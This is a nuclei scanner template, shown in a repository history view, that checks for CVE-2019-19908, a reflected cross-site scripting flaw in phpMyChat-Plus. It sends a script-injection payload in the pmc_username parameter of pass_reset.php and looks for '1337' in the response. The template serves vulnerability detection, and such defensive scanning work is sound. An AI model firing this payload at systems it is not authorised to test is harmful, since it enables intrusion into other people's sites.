nuclei-templates/cves/CVE-2019-19908.yaml

20 lines
368 B
YAML
Raw Normal View History

2020-04-08 13:04:46 +00:00
id: CVE-2019-19908
info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username="><script>alert(1337)</script>"
matchers:
- type: status
status:
- 200
2020-04-08 13:20:50 +00:00
- type: word
2020-04-08 13:24:57 +00:00
words:
2020-04-08 13:04:46 +00:00
- "1337"
part: body